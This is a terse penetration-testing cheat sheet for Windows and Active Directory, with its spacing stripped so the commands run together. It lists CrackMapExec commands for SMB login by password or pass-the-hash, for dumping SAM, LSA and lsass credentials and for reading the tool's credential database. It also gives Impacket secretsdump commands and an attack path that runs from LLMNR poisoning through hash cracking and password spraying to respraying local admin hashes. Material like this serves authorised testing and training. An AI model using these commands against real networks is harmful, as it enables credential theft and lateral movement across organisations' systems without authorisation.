# SMBcrackmapexecsmbIP_ADDRESSorSUBNET-uUSER-dDOMAIN-pPASSWORD# SMB using Hash (only NTLMv1)crackmapexecsmbIP_ADDRESSorSUBNET-uUSER-HHASH--local-auth# Dump SAM - add this at the end of the command--sam# List shares on machines--shares# Dump LSA--lsa# Use lsassy to dump and parse lsass-Mlsassy# Access CrackMapExec DBcmedb# Dumps all hosts in DBhosts# Dumps all creds in DBcreds
# Using a passwordsecretsdump.pyDOMAIN/USER:'PASSWORD'@IP_ADDRESS# Using hashes secretsdump.pyUSER@IP_ADDRESS-hashesHASH
Attack path
llmnr -> hash -> crack hashes -> spray password -> look for new logins -> secretsdump with new logins -> local admin hashes -> respray network with local accounts